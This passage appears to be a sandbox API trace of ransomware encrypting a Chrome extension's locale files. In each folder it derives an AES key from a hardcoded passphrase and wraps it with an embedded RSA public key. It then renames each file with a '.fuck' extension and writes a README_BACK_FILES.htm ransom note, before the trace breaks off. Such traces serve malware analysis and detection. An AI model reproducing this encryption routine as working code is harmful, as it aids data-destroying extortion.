0x0 [0260.462] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json")) returned 0x20 [0260.462] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0260.463] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.463] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.464] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.464] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.466] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.466] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.466] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.466] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.467] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.467] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.467] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f4a0) returned 1 [0260.467] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f4a0, dwCertEncodingType=0x1, pInfo=0x2eb2630*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2660*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2668*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d540) returned 1 [0260.467] CryptEncrypt (in: hKey=0x2e7d540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.467] CryptEncrypt (in: hKey=0x2e7d540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6fe30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6fe30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.467] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6fe30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6fe30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.468] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0260.469] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0260.469] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0260.469] CloseHandle (hObject=0x5d64) returned 1 [0260.469] CloseHandle (hObject=0x5d5c) returned 1 [0260.469] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), bFailIfExists=0) returned 1 [0260.472] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json", dwFileAttributes=0x0) returned 1 [0260.472] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0260.473] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0260.474] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.474] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.474] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.474] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.474] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.475] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0260.475] AreFileApisANSI () returned 1 [0260.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.475] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.475] GetFileType (hFile=0x5d60) returned 0x1 [0260.475] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.477] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.477] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0260.478] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.478] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.478] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.478] GetLastError () returned 0x0 [0260.478] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json")) returned 0x20 [0260.478] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0260.478] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.479] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.479] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.480] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.482] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.482] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.482] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.482] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c900) returned 1 [0260.482] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.482] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.482] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6feb8) returned 1 [0260.482] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6feb8, dwCertEncodingType=0x1, pInfo=0x2eb1fb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1fe0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1fe8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d580) returned 1 [0260.482] CryptEncrypt (in: hKey=0x2e7d580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.483] CryptEncrypt (in: hKey=0x2e7d580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6ff40*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6ff40*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.483] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e6ff40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6ff40*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.484] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xfd, lpOverlapped=0x0) returned 1 [0260.485] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xfd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0260.485] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0260.485] CloseHandle (hObject=0x5d5c) returned 1 [0260.485] CloseHandle (hObject=0x5d64) returned 1 [0260.485] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0260.488] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0260.488] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0260.489] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0260.490] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.490] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.490] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.490] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.490] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.490] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0260.491] AreFileApisANSI () returned 1 [0260.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.491] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.491] GetFileType (hFile=0x5d60) returned 0x1 [0260.491] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.493] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.493] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.494] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.494] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.494] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.494] GetLastError () returned 0x0 [0260.494] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json")) returned 0x20 [0260.494] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0260.494] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.495] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.496] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.496] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.498] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.498] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.498] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.498] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.498] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.498] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.498] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, 